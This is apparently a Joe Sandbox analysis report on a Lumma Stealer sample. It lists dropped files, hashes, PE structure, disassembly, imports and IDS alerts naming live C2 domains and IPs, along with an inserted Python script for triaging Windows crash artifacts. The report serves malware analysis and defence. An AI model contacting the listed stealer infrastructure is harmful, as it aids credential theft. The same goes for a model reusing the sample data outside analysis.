SSDEEP:192:b4Qa8RXXMBqIOx1B6NoTjju9g3jrWgHzp3T0s9WFcCasaxhP/tFKzNf5:La1BOTBtT24THzxwaXVFIp5
MD5:5328C90F9A1BBCE2C726B9424FB8C8FF
SHA1:EC19E4BA8A98B402EA7B9D00173C2727E6380D98
SHA-256:D7C7F33629156E91F7E85B95D39F2E923503156D6FC45C72818AB99AD30D8747
SHA-512:2A32CA871CC406B7C25892CED116FBC2C33B9A6D97F89BA7DBD4535FFF477295A6A08456B30EE067F66F6534F35702A89C67D127D569DAD4869A2AD52239E9D5
Malicious:false
Reputation:low
Preview:MDMP..a..... ........9ag............4...............H...........<.......t....,..........`.......8...........T............A...r......................................................................................................eJ......D ......GenuineIntel............T....... ....9ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8286
Entropy (8bit):3.7016541061973567
Encrypted:false
SSDEEP:192:R6l7wVeJda6X6Y0W6jqgmfjmUjgUpDt89bRWsfoQbm:R6lXJg6X6Yd6ugmfVgTR1fK
MD5:2F69279911E35E320DD1D1D8A3715DF7
SHA1:5836A1E152FAB27674604B5496831E97B778C978
SHA-256:D19BA928C236250F9A462DD7157FEBA33C89A0BF1EA4E3BF6ED1885AC8FC249C
SHA-512:06499496CB9AC98A031504256207BCB0F2F1887866925DACD2E985A7E4DE9FC4B681774BD560E34F9AF4C7F8EB89C1E3AF0EAF0951BAAC1911B3C662DE0E4F0E
Malicious:false
Reputation:low
Preview (UTF-16LE decoded):
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
    <OSVersionInformation>
        <WindowsNTVersion>10.0</WindowsNTVersion>
        <Build>19045</Build>
        <Product>(0x30): Windows 10 Pro</Product>
        <Edition>Professional</Edition>
        <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
        <Revision>2006</Revision>
        <Flavor>Multiprocessor Free</Flavor>
        <Architecture>X64</Architecture>
        <LCID>2057</LCID>
    </OSVersionInformation>
    <ProcessInformation>
        <Pid>7968</Pi
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4565
Entropy (8bit):4.445422187605192
Encrypted:false
SSDEEP:48:cvIwWl8zs9Jg77aI9WhnWpW8VY5Ym8M4JmLc91wcFOcI+q8h6dMCHmZquz+uId:uIjfXI7shW7VpJlI2xzLId
MD5:E27F2B3B33373BCFF329E97285127B00
SHA1:F14A6E65A1E3ACE4CB03CA23099708EEBECE3728
SHA-256:A4E1349DB3B2A96CE286F84C72E00576AC0A1BCB3385271400786911C36D7885
SHA-512:30FECC85D577E87CA329CAACD7E531EE8CD1FF8FE566468C64C734D86F60A4195F7941E9E0A7E3BB166D334586DA66E803B99A51734A6CD156016CA46AEB307A
Malicious:false
Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
  <tlm>
    <src>
      <desc>
        <mach>
          <os>
            <arg nm="vermaj" val="10" />
            <arg nm="vermin" val="0" />
            <arg nm="verbld" val="19045" />
            <arg nm="vercsdbld" val="2006" />
            <arg nm="verqfe" val="2006" />
            <arg nm="csdbld" val="2006" />
            <arg nm="versp" val="0" />
            <arg nm="arch" val="9" />
            <arg nm="lcid" val="2057" />
            <arg nm="geoid" val="223" />
            <arg nm="sku" val="48" />
            <arg nm="domain" val="0" />
            <arg nm="prodsuite" val="256" />
            <arg nm="ntprodtype" val="1" />
            <arg nm="platid" val="2" />
            <arg nm="tmsi" val="635025" />
            <arg nm="osinsty" val="1" />
            <arg nm="iever" val="11.789.19041.0-11.0.1000" />
            <arg nm="portos" val="0" />
            <arg nm="ram" val="409
Process:C:\Users\user\Desktop\hpEAJnNwCB.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):367616
Entropy (8bit):6.6925040559075155
Encrypted:false
SSDEEP:6144:hT46u0Jny38rm3bYIOhtVlJ2rlC0vGLfAq0TwdLZc:hT46uIysrm3bY51+nODFMwPc
MD5:CC2566EAE03240FFC314E5BEE2DC4D26
SHA1:5E146C18717F7AA8CBD226EC750BCE41BD8AA4B3
SHA-256:9F2583D6908053C7FDF7E8B2DA4F578432E761ADBF11CBEAB3B78B7DA71ED843
SHA-512:62F09B2AD6609ED4730D661F23BD4BB53DF1EC8A9A9E305E3BC3945CE61F1641666ADFC902998C4656A8EE224C816188664373E5E269F54D140A79221463B19D
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L....m.e.....................&?.....w.............@.......................... C..............................................)..<.....B..............................................................................................................text............................... ..`.rdata...#.......$..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................
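The four WerFault.exe artifacts above (Report.wer, the minidump, WERInternalMetadata.xml and the telemetry request) are the crash report for the sample's dropped child, named in Report.wer as NsAppName=91B1.tmp.exe, and the middle token of its TargetAppId (00005e146c18717f7aa8cbd226ec750bce41bd8aa4b3) ends in the SHA1 of the PE listed directly above (5E146C18717F7AA8CBD226EC750BCE41BD8AA4B3). The minidump's TimeDateStamp 0x67613993 is the "Tue Dec 17 08:42:59 2024" value in its File Type line, and the FILETIME in EventTime decodes to the same second. The Python below is an added triage example, not part of the Joe Sandbox report: it decodes a Report.wer, pulls that SHA-1 out of TargetAppId, checks it against the dropped-file hashes, and reads the MINIDUMP_HEADER so the two crash times can be compared. The Report.wer bytes and the minidump header are constructed from the previews in this report; the function names and the TargetAppId layout (a four-zero prefix before the SHA-1) are my reading of this one sample, not a specification.

```python
"""Triage of WER crash artifacts dropped beside a malware child process.
Added example, not part of the Joe Sandbox report. All inputs are constructed
from the previews in the report (Report.wer fields, MINIDUMP_HEADER values,
dropped-file hashes); the function names and the TargetAppId layout are an
assumption drawn from this one sample."""
import re
import struct
from datetime import datetime, timezone
from typing import Optional

# Constructed Report.wer: the key=value lines from the report's preview,
# re-encoded the way WerFault.exe writes the file (UTF-16LE, BOM, CRLF).
REPORT_WER_BYTES = b"\xff\xfe" + (
    "Version=1\r\n"
    "EventType=APPCRASH\r\n"
    "EventTime=133788985793629873\r\n"
    "ReportType=2\r\n"
    "Consent=1\r\n"
    "UploadTime=133788985798161041\r\n"
    "ReportStatus=655456\r\n"
    "ReportIdentifier=983e4d82-f09f-4ef8-a85f-abf4b4cadb06\r\n"
    "IntegratorReportIdentifier=bbe111e4-8a7b-4242-a8cc-f6257806e279\r\n"
    "Wow64Host=34404\r\n"
    "Wow64Guest=332\r\n"
    "NsAppName=91B1.tmp.exe\r\n"
    "AppSessionGuid=00001f20-0001-0013-01b4-44a45f50db01\r\n"
    "TargetAppId=W:00068da079f83ceccffaea924b233bb95afa0000ffff"
    "!00005e146c18717f7aa8cbd226ec750bce41bd8aa4b3!91B1.tmp.exe\r\n"
).encode("utf-16-le")

# Constructed 32-byte MINIDUMP_HEADER: signature, version (low word 0xA793),
# 15 streams, directory RVA 0x20, checksum 0, TimeDateStamp 0x67613993
# (Tue Dec 17 08:42:59 2024 UTC) and Flags 0x1205a4, as in the report.
MINIDUMP_HEADER_FMT = "<4sIIIIIQ"
MINIDUMP_BYTES = struct.pack(MINIDUMP_HEADER_FMT, b"MDMP", 0x0061A793, 15,
                             0x20, 0, 0x67613993, 0x1205A4)

# Hashes of the PE that hpEAJnNwCB.exe dropped, copied from the report.
DROPPED_FILES = [
    {"sha1": "5E146C18717F7AA8CBD226EC750BCE41BD8AA4B3",
     "md5": "CC2566EAE03240FFC314E5BEE2DC4D26", "size": 367616},
]

# Seconds between the FILETIME epoch (1601-01-01) and the Unix epoch.
FILETIME_EPOCH_DELTA = 11644473600


def parse_report_wer(data: bytes) -> dict:
    """Decode Report.wer (UTF-16 with BOM) into a key -> value dict."""
    fields = {}
    for line in data.decode("utf-16").splitlines():  # codec consumes the BOM
        key, sep, value = line.partition("=")
        if sep:
            fields[key] = value
    return fields


def filetime_to_iso(filetime: int) -> str:
    """Convert a 100 ns FILETIME (EventTime/UploadTime) to ISO-8601 UTC."""
    seconds = filetime // 10_000_000 - FILETIME_EPOCH_DELTA
    return datetime.fromtimestamp(seconds, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def sha1_from_target_app_id(target_app_id: str) -> Optional[str]:
    """Extract the SHA-1 of the crashed image from TargetAppId.

    Layout seen in this sample: 'W:<44 hex>!<0000 + 40-hex SHA-1>!<image name>'.
    Only the trailing 40 hex digits of the middle token are used, so a
    different prefix length would still work (assumption, not a spec)."""
    parts = target_app_id.split("!")
    if len(parts) < 3:
        return None
    match = re.search(r"([0-9a-fA-F]{40})$", parts[1])
    return match.group(1).upper() if match else None


def parse_minidump_header(data: bytes) -> dict:
    """Read the fixed MINIDUMP_HEADER; TimeDateStamp is a 32-bit time_t."""
    sig, version, streams, dir_rva, _checksum, ts, flags = struct.unpack_from(
        MINIDUMP_HEADER_FMT, data, 0)
    if sig != b"MDMP":
        raise ValueError("not a minidump")
    return {
        "version": version & 0xFFFF,
        "streams": streams,
        "directory_rva": dir_rva,
        "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "flags": flags,
    }


def correlate(report: dict, dropped: list) -> dict:
    """Tie the crash report to a dropped file by the SHA-1 in TargetAppId."""
    sha1 = sha1_from_target_app_id(report.get("TargetAppId", ""))
    hit = next((d for d in dropped if d["sha1"].upper() == sha1), None)
    return {
        "crashed_image": report.get("NsAppName"),
        "event_type": report.get("EventType"),
        "event_time_utc": filetime_to_iso(int(report["EventTime"])),
        "image_sha1": sha1,
        "matches_dropped_file": hit is not None,
        "dropped_md5": hit["md5"] if hit else None,
    }


if __name__ == "__main__":
    print(correlate(parse_report_wer(REPORT_WER_BYTES), DROPPED_FILES))
    print(parse_minidump_header(MINIDUMP_BYTES))
```

On a real case the same functions run over the Report.wer and .dmp files under the WER ReportQueue/ReportArchive directories; the point of the SHA-1 check is that it identifies the crashed binary even when the dropped file has since been deleted, and the two timestamps bound when the child was running.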
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\hpEAJnNwCB.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):367616
                                                                                                                                                                                                                                          Entropy (8bit):6.6925040559075155
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:hT46u0Jny38rm3bYIOhtVlJ2rlC0vGLfAq0TwdLZc:hT46uIysrm3bY51+nODFMwPc
                                                                                                                                                                                                                                          MD5:CC2566EAE03240FFC314E5BEE2DC4D26
                                                                                                                                                                                                                                          SHA1:5E146C18717F7AA8CBD226EC750BCE41BD8AA4B3
                                                                                                                                                                                                                                          SHA-256:9F2583D6908053C7FDF7E8B2DA4F578432E761ADBF11CBEAB3B78B7DA71ED843
                                                                                                                                                                                                                                          SHA-512:62F09B2AD6609ED4730D661F23BD4BB53DF1EC8A9A9E305E3BC3945CE61F1641666ADFC902998C4656A8EE224C816188664373E5E269F54D140A79221463B19D
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L....m.e.....................&?.....w.............@.......................... C..............................................)..<.....B..............................................................................................................text............................... ..`.rdata...#.......$..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                                          Entropy (8bit):4.295945183521544
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:q41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+yG5mBMZJh1Vjy:z1/YCW2AoQ0NiwG5wMHrVO
                                                                                                                                                                                                                                          MD5:58735CD5409BAA4C8768A4C49896E1B7
                                                                                                                                                                                                                                          SHA1:634ED7EA24DB86C04BAD292F95614DFB0E506CFF
                                                                                                                                                                                                                                          SHA-256:457EE7825D6F727CE503A9D86808F697E1E7291691776B0BA6BA9E12ECBC1459
                                                                                                                                                                                                                                          SHA-512:0F58A6DABA1BAA8877D0D5D67E658C6FA7AB1108BBDF9AC118DF3E7F4959F6B57D45C2EF792C57967467AD57774FCF2EB1775AA5D59786D82024B415A78CE43B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.W.._P..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):7.023453801819406
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                          File name:hpEAJnNwCB.exe
                                                                                                                                                                                                                                          File size:435'712 bytes
                                                                                                                                                                                                                                          MD5:07a0b87962fbee50d2adc913f06a3e3b
                                                                                                                                                                                                                                          SHA1:1d8772e4953a5644fed016c3603f7db6aeffaa2a
                                                                                                                                                                                                                                          SHA256:85e572ae248f77ea01360746b27349c2baed236a9790e1c1ec7889d35ee1787f
                                                                                                                                                                                                                                          SHA512:1fa95888d25720d95e34b1ed23c8da6ed65ce4bf54b65946162d4ae13c1b5bbdf4e980caeb4035596d77b121ad000f41fbd831933e0392bbf81fc05333552fcb
                                                                                                                                                                                                                                          SSDEEP:6144:RAk0A0JKGFK5aIHpqojgkngvI2yu8LOzKxmQTlO1o3lOS/TwdsQ7Mz:RAk0AfVaNojHgQ2E+Kx/Zqo3hbwKrz
                                                                                                                                                                                                                                          TLSH:C994E01171F19622E3F34A75793AE7A46E3BB9726E34569E2358162F0E313D1CE22703
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L..
                                                                                                                                                                                                                                          Icon Hash:46c7c30b0f4e0d59
                                                                                                                                                                                                                                          Entrypoint:0x401877
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x667351F9 [Wed Jun 19 21:47:37 2024 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:f9df41ae4b2e96d07a46131787a7a3b9
                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          call 00007F8BFC4D180Bh
                                                                                                                                                                                                                                          jmp 00007F8BFC4CDE8Dh
                                                                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                                          sub esp, 00000328h
                                                                                                                                                                                                                                          mov dword ptr [00456C38h], eax
                                                                                                                                                                                                                                          mov dword ptr [00456C34h], ecx
                                                                                                                                                                                                                                          mov dword ptr [00456C30h], edx
                                                                                                                                                                                                                                          mov dword ptr [00456C2Ch], ebx
                                                                                                                                                                                                                                          mov dword ptr [00456C28h], esi
                                                                                                                                                                                                                                          mov dword ptr [00456C24h], edi
                                                                                                                                                                                                                                          mov word ptr [00456C50h], ss
                                                                                                                                                                                                                                          mov word ptr [00456C44h], cs
                                                                                                                                                                                                                                          mov word ptr [00456C20h], ds
                                                                                                                                                                                                                                          mov word ptr [00456C1Ch], es
                                                                                                                                                                                                                                          mov word ptr [00456C18h], fs
                                                                                                                                                                                                                                          mov word ptr [00456C14h], gs
                                                                                                                                                                                                                                          pushfd
                                                                                                                                                                                                                                          pop dword ptr [00456C48h]
                                                                                                                                                                                                                                          mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                          mov dword ptr [00456C3Ch], eax
                                                                                                                                                                                                                                          mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                          mov dword ptr [00456C40h], eax
                                                                                                                                                                                                                                          lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                          mov dword ptr [00456C4Ch], eax
                                                                                                                                                                                                                                          mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                          mov dword ptr [00456B88h], 00010001h
                                                                                                                                                                                                                                          mov eax, dword ptr [00456C40h]
                                                                                                                                                                                                                                          mov dword ptr [00456B3Ch], eax
                                                                                                                                                                                                                                          mov dword ptr [00456B30h], C0000409h
                                                                                                                                                                                                                                          mov dword ptr [00456B34h], 00000001h
                                                                                                                                                                                                                                          mov eax, dword ptr [00454004h]
                                                                                                                                                                                                                                          mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                          mov eax, dword ptr [00454008h]
                                                                                                                                                                                                                                          mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                          call dword ptr [000000C8h]
                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                          • [C++] VS2008 build 21022
                                                                                                                                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                          • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                                                                                                                                          • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x529fc | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x431000 | 0x10ca8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x52558 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x51000 | 0x194 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4fe6c | 0x50000 | 5e798783628d3816e27517d6fbaf4547 | False | 0.8434112548828125 | data | 7.543282648713042 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x51000 | 0x230e | 0x2400 | fb75eb231dfcb7959eefbe2ed90fab32 | False | 0.3597005208333333 | data | 5.435459920506363 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x54000 | 0x3dc4bc | 0x7000 | b8ba256305db9de2431645ec9d5e1375 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x431000 | 0x10ca8 | 0x10e00 | 0cc7cdf18cd3f89909ec9aa250611168 | False | 0.5896556712962963 | data | 5.799259140137772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4315b0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.5101279317697228
RT_ICON | 0x432458 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.5658844765342961
RT_ICON | 0x432d00 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.6002304147465438
RT_ICON | 0x4333c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.6394508670520231
RT_ICON | 0x433930 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkmen | Turkmenistan | 0.4099585062240664
RT_ICON | 0x435ed8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.4793621013133208
RT_ICON | 0x436f80 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.47704918032786886
RT_ICON | 0x437908 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.5806737588652482
RT_ICON | 0x437de8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.8171641791044776
RT_ICON | 0x438c90 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.8407039711191335
RT_ICON | 0x439538 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.7932027649769585
RT_ICON | 0x439c00 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.7117052023121387
RT_ICON | 0x43a168 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkmen | Turkmenistan | 0.8053941908713693
RT_ICON | 0x43c710 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.8320825515947468
RT_ICON | 0x43d7b8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.8450819672131148
RT_ICON | 0x43e140 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.8634751773049646
RT_STRING | 0x43e7d8 | 0x386 | data | | | 0.4567627494456763
RT_STRING | 0x43eb60 | 0xb2 | data | | | 0.601123595505618
RT_STRING | 0x43ec18 | 0x6d0 | data | | | 0.4288990825688073
RT_STRING | 0x43f2e8 | 0x71e | data | | | 0.4313940724478595
RT_STRING | 0x43fa08 | 0x6e2 | data | | | 0.43473325766174803
RT_STRING | 0x4400f0 | 0x65c | data | | | 0.43611793611793614
RT_STRING | 0x440750 | 0x71a | data | | | 0.4251925192519252
RT_STRING | 0x440e70 | 0x7c4 | data | | | 0.4200201207243461
RT_STRING | 0x441638 | 0x66a | data | | | 0.43118148599269185
RT_GROUP_ICON | 0x43e5a8 | 0x76 | data | Turkmen | Turkmenistan | 0.6694915254237288
RT_GROUP_ICON | 0x437d70 | 0x76 | data | Turkmen | Turkmenistan | 0.6610169491525424
RT_VERSION | 0x43e620 | 0x1b8 | COM executable for DOS | | | 0.5636363636363636
DLL | Import
KERNEL32.dll | GetFileSize, SearchPathW, SetLocaleInfoA, InterlockedIncrement, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, ReadConsoleOutputAttribute, GetEnvironmentStringsW, Process32First, SetComputerNameW, GetTimeFormatA, SetEvent, GetProcessPriorityBoost, GetModuleHandleW, GetCommandLineA, GetEnvironmentStrings, LoadLibraryW, ReadProcessMemory, DeleteVolumeMountPointW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, LocalAlloc, AddAtomW, FoldStringA, CreatePipe, GetModuleHandleA, UpdateResourceW, OpenFileMappingW, GetShortPathNameW, FindFirstVolumeA, GetVersionExA, UnregisterWaitEx, SetFileAttributesW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
USER32.dll | GetProcessDefaultLayout
Language of compilation system | Country where language is spoken | Map
Turkmen | Turkmenistan |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T09:42:42.435931+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49709 | 104.21.56.70 | 443 | TCP
2024-12-17T09:42:44.008488+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49715 | 176.113.115.19 | 80 | TCP
2024-12-17T09:42:47.903636+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.10 | 63742 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:48.126339+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.10 | 58446 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:49.117774+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.10 | 58446 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:51.496307+0100 | 2058223 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) | 1 | 192.168.2.10 | 49736 | 45.77.249.79 | 443 | TCP
2024-12-17T09:42:51.496307+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49736 | 45.77.249.79 | 443 | TCP
2024-12-17T09:42:51.498310+0100 | 2822521 | ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) | 1 | 45.77.249.79 | 443 | 192.168.2.10 | 49736 | TCP
2024-12-17T09:42:52.466380+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.10 | 49736 | 45.77.249.79 | 443 | TCP
